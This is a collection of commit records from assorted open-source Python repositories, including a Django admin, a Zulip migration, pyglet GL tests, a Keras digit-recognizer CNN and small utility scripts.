50b9aff7914885b590748ebd8bca4350d138670c | Add admin section for the ``Resources``. | us-ignite/us_ignite,us-ignite/us_ignite,us-ignite/us_ignite,us-ignite/us_ignite,us-ignite/us_ignite | us_ignite/resources/admin.py | us_ignite/resources/admin.py | from django.contrib import admin
from us_ignite.resources.models import Resource
class ResourceAdmin(admin.ModelAdmin):
list_display = ('name', 'slug', 'status', 'is_featured')
search_fields = ('name', 'slug', 'description', 'url')
list_filter = ('is_featured', 'created')
date_hierarchy = 'created'
raw_id_fields = ['owner', ]
admin.site.register(Resource, ResourceAdmin)
| bsd-3-clause | Python |
|
20c9f1416243c020b270041621098ca20e09eca4 | tag retrieval script added | stopstalk/stopstalk-deployment,stopstalk/stopstalk-deployment,stopstalk/stopstalk-deployment,stopstalk/stopstalk-deployment,stopstalk/stopstalk-deployment | private/scripts/extras/timus_tag_retrieval.py | private/scripts/extras/timus_tag_retrieval.py | """
Copyright (c) 2015-2018 Raj Patel([email protected]), StopStalk
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import bs4, requests
from time import sleep
tags = set([])
for i in xrange(1900, 2111):
url = "http://acm.timus.ru/problem.aspx?space=1&num=%d&locale=en" % i
response = requests.get(url)
soup = bs4.BeautifulSoup(response.text, "lxml")
all_as = soup.find("div",
class_="problem_links").previous_sibling.find_all("a")[:-1]
print i, [x.text for x in all_as]
for tmp in all_as:
tags.add(tmp.text)
sleep(1)
print tags | mit | Python |
|
9932b1989038bd3376b1c5d3f5d9c65a21670831 | add energy calibration to xpd | NSLS-II-XPD/ipython_ophyd,NSLS-II-XPD/ipython_ophyd | profile_collection/startup/42-energy-calib.py | profile_collection/startup/42-energy-calib.py | from __future__ import division, print_function
import numpy as np
from lmfit.models import VoigtModel
from scipy.signal import argrelmax
import matplotlib.pyplot as plt
def lamda_from_bragg(th, d, n):
return 2 * d * np.sin(th / 2.) / n
def find_peaks(chi, sides=6, intensity_threshold=0):
# Find all potential peaks
preliminary_peaks = argrelmax(chi, order=20)[0]
# peaks must have at least sides pixels of data to work with
preliminary_peaks2 = preliminary_peaks[
np.where(preliminary_peaks < len(chi) - sides)]
# make certain that a peak has a drop off which causes the peak height to
# be more than twice the height at sides pixels away
criteria = chi[preliminary_peaks2] >= 2 * chi[preliminary_peaks2 + sides]
criteria *= chi[preliminary_peaks2] >= 2 * chi[preliminary_peaks2 - sides]
criteria *= chi[preliminary_peaks2] >= intensity_threshold
peaks = preliminary_peaks[np.where(criteria)]
left_idxs = peaks - sides
right_idxs = peaks + sides
peak_centers = peaks
left_idxs[left_idxs < 0] = 0
right_idxs[right_idxs > len(chi)] = len(chi)
return left_idxs, right_idxs, peak_centers
def get_energy_from_std_tth(x, y, d_spacings, ns, plot=False):
# step 1 get the zero
auto_corr = np.correlate(y, y, mode='same')
plt.plot(x, auto_corr)
plt.show()
zero_point = np.argmax(auto_corr)
    print(len(x) // 2, zero_point)
    print(x[len(x) // 2], x[zero_point])
new_x = x - x[zero_point]
if plot:
plt.plot(x, y, 'b')
plt.plot(x[zero_point], y[zero_point], 'ro')
plt.plot(new_x, y, 'g')
plt.show()
# step 2 get all the maxima worth looking at
l, r, c = find_peaks(y)
print(l, r, c)
lmfig_centers = []
for lidx, ridx, peak_center in zip(l, r, c):
mod = VoigtModel()
pars = mod.guess(y[lidx: ridx],
x=x[lidx: ridx])
out = mod.fit(y[lidx: ridx], pars,
x=x[lidx: ridx])
lmfig_centers.append(out.values['center'])
if plot:
plt.plot(new_x, y)
plt.plot(new_x[c], y[c], 'ro')
plt.show()
wavelengths = []
for center, d, n in zip(lmfig_centers, d_spacings, ns):
wavelengths.append(lamda_from_bragg(center, d, n))
return np.average(wavelengths)
if __name__ == '__main__':
import os
directory = '/home/cwright/Downloads'
filename='Lab6_67p8.chi'
calibration_file = os.path.join(directory, filename)
# step 0 load data
d_spacings = np.loadtxt(calibration_file)
# ns = np.ones(len(d_spacings))
# x = np.linspace(-np.pi, np.pi, 100)
# y = np.sin(x)
# x = np.linspace(-np.pi+1, np.pi, 100)
a = np.loadtxt('/home/cwright/Downloads/Lab6_67p8.chi')
x = a[:, 0]
x = np.hstack((np.zeros(1), x))
print(x.shape)
x = np.hstack((-x[::-1], x))
y = a[:, 1]
y = np.hstack((np.zeros(1), y))
y = np.hstack((y[::-1], y))
x = x[3:]
y = y[3:]
plt.plot(np.linspace(0, 10, x.shape[0]), y)
plt.show()
get_energy_from_std_tth(x, y, [], [], plot=True)
| bsd-2-clause | Python |
|
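A quick self-consistency check of lamda_from_bragg, which implements lambda = 2*d*sin(th/2)/n with th being the full scattering angle 2-theta (the d-spacing and wavelength values below are hypothetical):

import numpy as np
d, lam = 4.157, 0.1839               # a LaB6-like d-spacing and a wavelength, in angstroms
th = 2 * np.arcsin(lam / (2 * d))    # invert Bragg's law for n = 1
assert np.isclose(lamda_from_bragg(th, d, 1), lam)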
0136d50265fc390d194436238b88655327982231 | add gobOauth.py | BearlyKoalafied/GGGGobbler | gobOauth.py | gobOauth.py | import praw
import configparser
SAVEFILE = "oauth.ini"
def read_ini():
cfg = configparser.ConfigParser()
cfg.read(SAVEFILE)
return cfg
def get_refreshable_instance():
cfg = read_ini()
reddit = praw.Reddit(client_id=cfg['app']['client_id'],
client_secret=cfg['app']['client_secret'],
refresh_token=cfg['token']['refresh_token'],
user_agent=cfg['app']['user_agent'])
return reddit | mit | Python |
|
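The oauth.ini layout implied by the lookups above (section and key names are inferred from the code; the values are placeholders):

[app]
client_id = YOUR_CLIENT_ID
client_secret = YOUR_CLIENT_SECRET
user_agent = GGGGobbler oauth helper
[token]
refresh_token = YOUR_REFRESH_TOKEN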
e0b84a97e4c7ad5dcef336080657a884cff603fc | Test two windows drawing GL with different contexts. | infowantstobeseen/pyglet-darwincore,infowantstobeseen/pyglet-darwincore,infowantstobeseen/pyglet-darwincore,infowantstobeseen/pyglet-darwincore,infowantstobeseen/pyglet-darwincore | tests/gl_test_2.py | tests/gl_test_2.py | #!/usr/bin/env python
'''
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import pyglet.window
from pyglet.window.event import *
import time
from pyglet.GL.VERSION_1_1 import *
from pyglet.GLU.VERSION_1_1 import *
from pyglet import clock
factory = pyglet.window.WindowFactory()
factory.config._attributes['doublebuffer'] = 1
class ExitHandler(object):
running = True
def on_close(self):
self.running = False
def on_keypress(self, symbol, modifiers):
if symbol == pyglet.window.key.K_ESCAPE:
self.running = False
return EVENT_UNHANDLED
exit_handler = ExitHandler()
def setup():
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(60., 1., 1., 100.)
glMatrixMode(GL_MODELVIEW)
glClearColor(1, 1, 1, 1)
glColor4f(.5, .5, .5, .5)
def draw():
global r
glClear(GL_COLOR_BUFFER_BIT)
glLoadIdentity()
r += 1
if r > 360: r = 0
glRotatef(r, 0, 0, 1)
glBegin(GL_QUADS)
glVertex3f(-1., -1., -5.)
glVertex3f(-1., 1., -5.)
glVertex3f(1., 1., -5.)
glVertex3f(1., -1., -5.)
glEnd()
w1 = factory.create(width=200, height=200)
w1.push_handlers(exit_handler)
w1.switch_to()
setup()
c = clock.Clock()
w2 = factory.create(width=400, height=400)
w2.push_handlers(exit_handler)
w2.switch_to()
setup()
r = 0
while exit_handler.running:
c.set_fps(60)
w1.switch_to()
w1.dispatch_events()
draw()
w1.flip()
w2.switch_to()
w2.dispatch_events()
draw()
w2.flip()
| bsd-3-clause | Python |
|
8affb8e4a3744e604b88157a918ef690203cbfa8 | Remove disallowed characters from stream names. | zulip/zulip,andersk/zulip,zulip/zulip,rht/zulip,rht/zulip,andersk/zulip,kou/zulip,zulip/zulip,andersk/zulip,rht/zulip,zulip/zulip,rht/zulip,andersk/zulip,andersk/zulip,zulip/zulip,zulip/zulip,rht/zulip,kou/zulip,kou/zulip,zulip/zulip,kou/zulip,kou/zulip,kou/zulip,andersk/zulip,rht/zulip,rht/zulip,kou/zulip,andersk/zulip | zerver/migrations/0375_invalid_characters_in_stream_names.py | zerver/migrations/0375_invalid_characters_in_stream_names.py | import unicodedata
from django.db import connection, migrations
from django.db.backends.postgresql.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
# There are 66 Unicode non-characters; see
# https://www.unicode.org/faq/private_use.html#nonchar4
unicode_non_chars = set(
chr(x)
for x in list(range(0xFDD0, 0xFDF0)) # FDD0 through FDEF, inclusive
+ list(range(0xFFFE, 0x110000, 0x10000)) # 0xFFFE, 0x1FFFE, ... 0x10FFFE inclusive
+ list(range(0xFFFF, 0x110000, 0x10000)) # 0xFFFF, 0x1FFFF, ... 0x10FFFF inclusive
)
def character_is_printable(character: str) -> bool:
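    # "Cc" is the Unicode control-character category, "Cs" the surrogate category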
return not (unicodedata.category(character) in ["Cc", "Cs"] or character in unicode_non_chars)
def fix_stream_names(apps: StateApps, schema_editor: DatabaseSchemaEditor) -> None:
Stream = apps.get_model("zerver", "Stream")
Realm = apps.get_model("zerver", "Realm")
total_fixed_count = 0
realm_ids = Realm.objects.values_list("id", flat=True)
if len(realm_ids) == 0:
return
print("")
for realm_id in realm_ids:
print(f"Processing realm {realm_id}")
realm_stream_dicts = Stream.objects.filter(realm_id=realm_id).values("id", "name")
occupied_stream_names = set(stream_dict["name"] for stream_dict in realm_stream_dicts)
for stream_dict in realm_stream_dicts:
stream_name = stream_dict["name"]
fixed_stream_name = "".join(
[
character if character_is_printable(character) else "\N{REPLACEMENT CHARACTER}"
for character in stream_name
]
)
if fixed_stream_name == stream_name:
continue
if fixed_stream_name == "":
fixed_stream_name = "(no name)"
# The process of stripping invalid characters can lead to collisions,
# with the new stream name being the same as the name of another existing stream.
# We append underscore until the name no longer conflicts.
while fixed_stream_name in occupied_stream_names:
fixed_stream_name += "_"
occupied_stream_names.add(fixed_stream_name)
total_fixed_count += 1
with connection.cursor() as cursor:
cursor.execute(
"UPDATE zerver_stream SET name = %s WHERE id = %s",
[fixed_stream_name, stream_dict["id"]],
)
print(f"Fixed {total_fixed_count} stream names")
class Migration(migrations.Migration):
atomic = False
dependencies = [
("zerver", "0374_backfill_user_delete_realmauditlog"),
]
operations = [
migrations.RunPython(fix_stream_names, reverse_code=migrations.RunPython.noop),
]
| apache-2.0 | Python |
|
1deb35d9aa62a6c950cb978063c7f4aed645067b | Add utility module for logging | berkmancenter/mediacloud,berkmancenter/mediacloud,berkmancenter/mediacloud,berkmancenter/mediacloud,berkmancenter/mediacloud | mediacloud/mediawords/util/log.py | mediacloud/mediawords/util/log.py | import logging
def create_logger(name):
"""Create and return 'logging' instance."""
formatter = logging.Formatter(fmt='%(asctime)s - %(levelname)s - %(module)s - %(message)s')
handler = logging.StreamHandler()
handler.setFormatter(formatter)
l = logging.getLogger(name)
l.setLevel(logging.DEBUG)
l.addHandler(handler)
return l
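# usage sketch (module name is illustrative):
#   log = create_logger(__name__)
#   log.debug("message")  # written to stderr with timestamp, level and module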
| agpl-3.0 | Python |
|
12c483953f39a3bacaab6d49ba17c4920db52179 | Add script to clean up all FD phone and fax numbers. | FireCARES/firecares,HunterConnelly/firecares,HunterConnelly/firecares,FireCARES/firecares,FireCARES/firecares,FireCARES/firecares,FireCARES/firecares,HunterConnelly/firecares,HunterConnelly/firecares | firecares/firestation/management/commands/cleanup_phonenumbers.py | firecares/firestation/management/commands/cleanup_phonenumbers.py | from django.core.management.base import BaseCommand
from firecares.firestation.models import FireDepartment
from phonenumber_field.modelfields import PhoneNumber
import re
"""
This command is for cleaning up every phone and fax number in the
database. It removes all non-numeric characters, such as parentheses,
hyphens, spaces, etc. It also removes a prefixed 1. These numbers should
be made human-readable on the client side.
"""
def cleanNumber(no1):
no2 = re.sub('[^0-9]','', no1)
if no2.startswith("1"):
no2 = no2[1:]
return no2
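# e.g. cleanNumber("1 (555) 123-4567") -> "5551234567"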
class Command(BaseCommand):
def handle(self, *args, **kwargs):
print("Don't worry, it always takes this long.")
for fd in FireDepartment.objects.all():
# If the FD has a phone number, clean it up
if fd.headquarters_phone and not fd.headquarters_phone.raw_input == "Invalid Input":
newPhone = cleanNumber(fd.headquarters_phone.raw_input)
print(newPhone)
fd.headquarters_phone = newPhone
# If the FD has a fax number, clean it up
if fd.headquarters_fax and not fd.headquarters_fax.raw_input == "Invalid Input":
newFax = cleanNumber(fd.headquarters_fax.raw_input)
print(newFax)
fd.headquarters_fax = newFax
# Save and continue to the next FD (if any)
fd.save()
print("Completed successfully!")
| mit | Python |
|
7d128f2386fd3bbcbff1a407018f9ab9ed580810 | Add tests for path join | tesera/pygypsy,tesera/pygypsy | tests/test_path.py | tests/test_path.py | from gypsy.path import _join
def test_join():
assert _join('s3://', 'bucket', 'prefix') == 's3://bucket/prefix'
assert _join('s3://bucket', 'prefix') == 's3://bucket/prefix'
assert _join('bucket', 'prefix') == 'bucket/prefix'
| mit | Python |
|
7589e8c746d264b4e8ebcdcf932ddd9620d419a3 | Implement user tests | Alweezy/cp2-bucketlist-api,Alweezy/cp2-bucketlist-api,Alweezy/cp2-bucketlist-api | tests/test_user.py | tests/test_user.py | import unittest
import json
from app import create_app, db
class UserTest(unittest.TestCase):
def setUp(self):
"""Define test variables and initialize app."""
self.app = create_app(config_name="testing")
self.client = self.app.test_client
# binds the app to the current context
with self.app.app_context():
# create all tables
db.create_all()
self.user = {"username": "nerd",
"password": "nerdy",
"email": "[email protected] "
}
def test_registration_successful(self):
"""Test successful user registration."""
        response = self.client().post('/auth/register/',
                                      data=json.dumps(self.user),
                                      content_type="application/json")
result = json.loads(response.data)
self.assertEqual(response.status_code, 200)
self.assertEqual(result["message"],
'User registration successful.')
self.assertEqual(result['username'],
self.user['username'])
def test_duplicate_user_registration(self):
"""Test registered user registration."""
resp = self.client().post('/auth/register/',
data=json.dumps(self.user),
content_type='application/json')
self.assertEqual(resp.status_code, 200)
res = self.client().post('/auth/register/',
data=json.dumps(self.user),
content_type='application/json')
self.assertEqual(res.status_code, 409)
result = json.loads(res.data)
self.assertEqual(result['message'],
"User with the username already exists.")
def test_login_successful(self):
"""Test successful user login."""
resp = self.client().post('/auth/register/',
data=json.dumps(self.user),
content_type="application/json")
self.assertEqual(resp.status_code, 200)
res = self.client().post('/auth/login/',
data=json.dumps(self.user),
content_type="application/json")
self.assertEqual(res.status_code, 200)
result = json.loads(res.data)
self.assertEqual(result['message'],
"Login successful.")
def test_unauthorised_login_attempt(self):
"""Test unauthorised login attempt."""
res = self.client().post('/auth/login/',
data=json.dumps(self.user),
content_type="application/json")
self.assertEqual(res.status_code, 401)
result = json.loads(res.data)
self.assertEqual(result['message'],
"Invalid username/password.")
def test_incomplete_login_credentials(self):
"""Test partial issue of login credentials"""
res = self.client().post('/auth/login/',
data=json.dumps({"username": "nerd"}),
content_type="application/json")
result = json.loads(res.data)
self.assertEqual(result['error'],
"missing data in request.")
def tearDown(self):
"""teardown all initialized variables."""
with self.app.app_context():
# drop all tables
db.session.remove()
db.drop_all()
if __name__ == '__main__':
unittest.main()
| mit | Python |
|
af2654df47b8b7ea60d78fd7f692e911c2d3a82c | allow oveerride of font used | odyaka341/pyglet,mpasternak/michaldtz-fix-552,Alwnikrotikz/pyglet,cledio66/pyglet,google-code-export/pyglet,cledio66/pyglet,arifgursel/pyglet,Alwnikrotikz/pyglet,kmonsoor/pyglet,qbektrix/pyglet,Alwnikrotikz/pyglet,mpasternak/michaldtz-fixes-518-522,cledio66/pyglet,arifgursel/pyglet,kmonsoor/pyglet,mpasternak/pyglet-fix-issue-552,mpasternak/pyglet-fix-issue-518-522,Austin503/pyglet,kmonsoor/pyglet,odyaka341/pyglet,cledio66/pyglet,Austin503/pyglet,kmonsoor/pyglet,xshotD/pyglet,mpasternak/pyglet-fix-issue-552,google-code-export/pyglet,Austin503/pyglet,mpasternak/michaldtz-fix-552,Alwnikrotikz/pyglet,Alwnikrotikz/pyglet,mpasternak/michaldtz-fixes-518-522,cledio66/pyglet,mpasternak/pyglet-fix-issue-552,mpasternak/pyglet-fix-issue-518-522,qbektrix/pyglet,shaileshgoogler/pyglet,google-code-export/pyglet,arifgursel/pyglet,odyaka341/pyglet,qbektrix/pyglet,shaileshgoogler/pyglet,mpasternak/michaldtz-fixes-518-522,mpasternak/michaldtz-fixes-518-522,odyaka341/pyglet,google-code-export/pyglet,mpasternak/pyglet-fix-issue-518-522,mpasternak/michaldtz-fix-552,xshotD/pyglet,mpasternak/pyglet-fix-issue-518-522,xshotD/pyglet,Austin503/pyglet,kmonsoor/pyglet,gdkar/pyglet,shaileshgoogler/pyglet,gdkar/pyglet,shaileshgoogler/pyglet,qbektrix/pyglet,arifgursel/pyglet,gdkar/pyglet,gdkar/pyglet,arifgursel/pyglet,mpasternak/michaldtz-fix-552,odyaka341/pyglet,Austin503/pyglet,xshotD/pyglet,gdkar/pyglet,qbektrix/pyglet,mpasternak/pyglet-fix-issue-552,shaileshgoogler/pyglet,xshotD/pyglet,google-code-export/pyglet | tests/text_test.py | tests/text_test.py | import sys
import os
import time
import pyglet.window
from pyglet.window.event import *
from pyglet.GL.VERSION_1_1 import *
from pyglet.GLU.VERSION_1_1 import *
from pyglet import clock
from pyglet.text import Font
from ctypes import *
factory = pyglet.window.WindowFactory()
factory.config._attributes['doublebuffer'] = 1
w1 = factory.create(width=400, height=200)
if len(sys.argv) == 2:
filename = sys.argv[1]
else:
filename = os.path.join(os.path.split(__file__)[0], 'Vera.ttf')
font = Font.load_font(filename, 72)
text = font.render('Hello World!')
exit_handler = ExitHandler()
w1.push_handlers(exit_handler)
c = clock.Clock()
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0, w1.width, 0, w1.height, -1, 1)
glEnable(GL_COLOR_MATERIAL)
glMatrixMode(GL_MODELVIEW)
glClearColor(0, 0, 0, 0)
glColor4f(1, 1, 1, 1)
r = 0
while not exit_handler.exit:
c.set_fps(60)
w1.dispatch_events()
glClear(GL_COLOR_BUFFER_BIT)
glLoadIdentity()
#r += 1
if r > 360: r = 0
glTranslatef(w1.width/2, w1.height/2, 0)
glRotatef(r, 0, 0, 1)
glTranslatef(-text.width/2, -text.height/2, 0)
text.draw()
w1.flip()
| import sys
import os
import time
import pyglet.window
from pyglet.window.event import *
from pyglet.GL.VERSION_1_1 import *
from pyglet.GLU.VERSION_1_1 import *
from pyglet import clock
from pyglet.text import Font
from ctypes import *
factory = pyglet.window.WindowFactory()
factory.config._attributes['doublebuffer'] = 1
w1 = factory.create(width=400, height=200)
filename = os.path.join(os.path.split(__file__)[0], 'Vera.ttf')
font = Font.load_font(filename, 72)
text = font.render('Hello World!')
exit_handler = ExitHandler()
w1.push_handlers(exit_handler)
c = clock.Clock()
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0, w1.width, 0, w1.height, -1, 1)
glEnable(GL_COLOR_MATERIAL)
glMatrixMode(GL_MODELVIEW)
glClearColor(0, 0, 0, 0)
glColor4f(1, 1, 1, 1)
r = 0
while not exit_handler.exit:
c.set_fps(60)
w1.dispatch_events()
glClear(GL_COLOR_BUFFER_BIT)
glLoadIdentity()
#r += 1
if r > 360: r = 0
glTranslatef(w1.width/2, w1.height/2, 0)
glRotatef(r, 0, 0, 1)
glTranslatef(-text.width/2, -text.height/2, 0)
text.draw()
w1.flip()
| bsd-3-clause | Python |
4e5a1a799bea020c145e544de255e3322ecc5aed | add kerasCNN | puyokw/kaggle_digitRecognizer,puyokw/kaggle_digitRecognizer | kerasCNN.py | kerasCNN.py | from __future__ import absolute_import
from __future__ import print_function
import numpy as np
import pandas as pd
np.random.seed(1337) # for reproducibility
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.layers.normalization import BatchNormalization
from keras.layers.advanced_activations import PReLU
from keras.utils import np_utils, generic_utils
from keras.optimizers import Adam, SGD, Optimizer
from keras.callbacks import Callback, EarlyStopping, ModelCheckpoint
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import confusion_matrix, log_loss
from sklearn.ensemble import BaggingClassifier
from sklearn.cross_validation import StratifiedKFold, KFold
path = './'
batch_size = 256
nb_classes = 10
img_rows, img_cols = 28, 28 # input image dimensions
nb_filters = 32 # number of convolutional filters to use
nb_pool = 2 # size of pooling area for max pooling
nb_conv = 3 # convolution kernel size
# the data, shuffled and split between train and test sets
train = pd.read_csv(path+'train.csv')
labels = train['label']
del train['label']
test = pd.read_csv(path+'test.csv')
train = train.values
train = train.reshape(train.shape[0], 1, img_rows, img_cols)
test = test.values
test = test.reshape(test.shape[0], 1, img_rows, img_cols)
train = train.astype("float32")
test = test.astype("float32")
train /= 255
test /= 255
print('train shape:', train.shape)
print(train.shape[0], 'train samples')
print(test.shape[0], 'test samples')
# convert class vectors to binary class matrices
label = np_utils.to_categorical(labels, nb_classes)
N = train.shape[0]
trainId = np.array(range(N))
submissionTr = pd.DataFrame(index=trainId,columns=np.array(range(10)))
nfold=5
RND = np.random.randint(0,10000,nfold)
pred = np.zeros((test.shape[0],10))
score = np.zeros(nfold)
i=0
skf = StratifiedKFold(labels, nfold, random_state=1337)
for tr, te in skf:
X_train, X_valid, y_train, y_valid = train[tr], train[te], label[tr], label[te]
predTr = np.zeros((X_valid.shape[0],10))
n_bag=5
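    # within each CV fold the network is retrained n_bag times from scratch and
    # the fold predictions are averaged (simple bagging)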
for j in range(n_bag):
print('nfold: ',i,'/',nfold, ' n_bag: ',j,' /',n_bag)
print("Building model...")
model = Sequential()
model.add(Convolution2D(nb_filters, nb_conv, nb_conv,
border_mode='full',
input_shape=(1, img_rows, img_cols)))
model.add(Activation('relu'))
model.add(Convolution2D(nb_filters, nb_conv, nb_conv))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))
model.add(Dropout(0.25))
model.add(Activation('relu'))
model.add(Convolution2D(nb_filters, nb_conv, nb_conv))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128))
model.add(Activation('relu'))
model.add(Dropout(0.25))
model.add(Dense(nb_classes))
model.add(Activation('softmax'))
earlystopping=EarlyStopping(monitor='val_loss', patience=10, verbose=1)
checkpointer = ModelCheckpoint(filepath=path+"weights.hdf5", verbose=0, save_best_only=True)
model.compile(loss='categorical_crossentropy', optimizer='adadelta')
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=1000, show_accuracy=True,
verbose=2, validation_data=(X_valid,y_valid), callbacks=[earlystopping,checkpointer])
model.load_weights(path+"weights.hdf5")
print("Generating submission...")
pred += model.predict_proba(test)
predTr += model.predict_proba(X_valid)
predTr /= n_bag
submissionTr.iloc[te] = predTr
score[i]= log_loss(y_valid,predTr,eps=1e-15, normalize=True)
print(score[i])
i+=1
pred /= (nfold * n_bag)
print("ave: "+ str(np.average(score)) + "stddev: " + str(np.std(score)))
print(confusion_matrix(labels, submissionTr.idxmax(axis=1)))
pd.DataFrame(pred).to_csv(path+"kerasCNN.csv",index_label='ImageId')
Label=pd.DataFrame(pred).idxmax(axis=1)
submission = pd.DataFrame({'ImageId': np.array(range(test.shape[0]))+1, 'Label': Label})
submission.to_csv(path+"kerasCNN_submission.csv",index=False)
print(log_loss(labels,submissionTr.values,eps=1e-15, normalize=True))
submissionTr.to_csv(path+"kerasCNN_stack.csv",index_label='ImageId')
# nfold 5, bagging 5: 0.020957301 + 0.00140977765 , Public LB: 0.99371
# batch_size 256: 0.0203983009777 + 0.00172547876286, Public LB: 0.99414
| mit | Python |
|
7336cc3c89727383c7a9cbbf564f6cfce7f198f9 | add similiarty3.py | yzvickie/new_insightfl,yzvickie/new_insightfl,yzvickie/new_insightfl | app/find_similarity3.py | app/find_similarity3.py | import sys
import string
import requests
import json
import pymysql
import numpy as np
import pandas as pd
from operator import itemgetter
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.decomposition import PCA, RandomizedPCA, TruncatedSVD
from sklearn.preprocessing import Normalizer
def find_companies(investorname):
investorname = np.int(investorname)
rmatrix= np.loadtxt(open("investorcompanyPCA.csv"),delimiter=",")
investor_id = np.loadtxt(open("investorIDorder.csv"),delimiter=",")
investor_id = investor_id.astype(int)
count=0
score = []
target=[]
for row in investor_id:
if row == investorname:
target = rmatrix[count]
break
count += 1
counter2 = 0
for row in rmatrix:
#score.append([cosine_similarity(target,row).tolist()[0][0], investor_id[counter2]])
score.append({u'similarity': cosine_similarity(target,row).tolist()[0][0], u'investor_id': investor_id[counter2]})
counter2 += 1
#score = sorted(score,reverse=True)
con = pymysql.connect(host='localhost', user='root', passwd='****')
cur = con.cursor()
cur.execute('''USE Venturenetwork16;''')
current_query='''SELECT startupID FROM Investor_comp'''
company_total = pd.io.sql.frame_query(current_query, con)
company_total = list(company_total['startupID'])
similarcomp=[]
current_query='''SELECT * FROM Investor_comp'''
rows = pd.io.sql.frame_query(current_query, con)
df = pd.Series(list(rows['startupID']),list(rows['investor_id']))
score = sorted(score,key=itemgetter('similarity'),reverse=True)
similarcomp = []
for investor_row in score[1:20]:
for company in list(df[investor_row['investor_id']]):
similarcomp.append([company, investor_row['similarity']])
companyid = [ row[0] for row in similarcomp ]
companysim = [ row[1] for row in similarcomp ]
uniquecompID = list(set(companyid))
uniquesimcomp = []
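    # aggregate per company: sum the similarity scores of all similar investors
    # backing it, skipping companies the target investor already holds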
for company in uniquecompID:
compscore = 0
for company2 in similarcomp:
if company == company2[0] and company not in list(df[investorname]):
compscore += company2[1]
uniquesimcomp.append([compscore, company])
return sorted(uniquesimcomp, reverse=True)[0:40], score
if __name__ == "__main__":
[uniquesimcomp,score] = find_companies(sys.argv[1])
print [uniquesimcomp,score]
| mit | Python |
|
08988d19c712ad4604f0acced71a069c7c20067a | Add kv store for file storage | cgwire/zou | zou/app/stores/file_store.py | zou/app/stores/file_store.py | import flask_fs as fs
from zou.app import app
pictures = fs.Storage("pictures", overwrite=True)
movies = fs.Storage("movies", overwrite=True)
pictures.configure(app)
movies.configure(app)
def make_key(prefix, id):
return "%s-%s" % (prefix, id)
def add_picture(prefix, id, path):
key = make_key(prefix, id)
with open(path, 'rb') as fd:
return pictures.write(key, fd)
def get_picture(prefix, id):
key = make_key(prefix, id)
return pictures.read(key)
def open_picture(prefix, id):
key = make_key(prefix, id)
return pictures.open(key, 'rb')
def exists_picture(prefix, id):
key = make_key(prefix, id)
return pictures.exists(key)
def remove_picture(prefix, id):
key = make_key(prefix, id)
pictures.delete(key)
def add_movie(prefix, id, content):
key = make_key(prefix, id)
return movies.write(key, content)
def get_movie(prefix, id):
key = make_key(prefix, id)
return movies.read(key)
def open_movie(prefix, id):
key = make_key(prefix, id)
return movies.open(key, 'rb')
def exists_movie(prefix, id):
key = make_key(prefix, id)
return movies.exists(key)
def remove_movie(prefix, id):
key = make_key(prefix, id)
movies.delete(key)
| agpl-3.0 | Python |
|
56c27d56ca16f6659a478af0b6529291b1140636 | Create find-peak-element-ii.py | kamyu104/LintCode,jaredkoontz/lintcode,jaredkoontz/lintcode,jaredkoontz/lintcode,kamyu104/LintCode,kamyu104/LintCode | Python/find-peak-element-ii.py | Python/find-peak-element-ii.py | # Time: O(max(m, n))
# Space: O(1)
class Solution:
#@param A: An list of list integer
#@return: The index of position is a list of integer, for example [2,2]
def findPeakII(self, A):
upper, down = 0, len(A) - 1
left, right = 0, len(A[0]) - 1
while upper < down and left < right:
height = down - upper + 1
width = right - left + 1
# T(m, n) = T(m / 2, n / 2) + O(m) + O(n / 2) = O(max(m, n))
if width > height: # Vertical split.
mid_j = left + (right - left) / 2
left_max, central_max, right_max = 0, 0, 0
max_i, max_j = -1, -1
for i in xrange(upper+1, down):
if A[i][mid_j] > central_max:
max_i, max_j = i, mid_j
central_max = A[i][mid_j]
left_max = max(left_max, A[i][mid_j - 1])
right_max = max(right_max, A[i][mid_j + 1])
if left_max > central_max and left_max > right_max: # Find left.
right = mid_j
elif right_max > central_max and right_max > left_max: # Find right.
left = mid_j
else: # Find one peak.
return [max_i, max_j]
else: # Horizontal split.
mid_i = upper + (down - upper) / 2
upper_max, central_max, down_max = 0, 0, 0
max_i, max_j = 0, 0
for j in xrange(left + 1, right):
if A[mid_i][j] > central_max:
max_i, max_j = mid_i, j
central_max = A[mid_i][j]
upper_max = max(upper_max, A[mid_i - 1][j])
down_max = max(down_max, A[mid_i + 1][j])
if upper_max > central_max and upper_max > down_max: # Find upper.
down = mid_i
elif down_max > central_max and down_max > upper_max: # Find down.
upper = mid_i
else: # Find one peak.
return [max_i, max_j]
return [-1, -1] # Not found.
| mit | Python |
|
49882e51faa26dbaa17a5f3510f0ba215b317dac | add simple test | mode89/snn,mode89/snn,mode89/snn | test/simple.py | test/simple.py | import matplotlib.pyplot as plt
import numpy
numpy.random.seed(0)
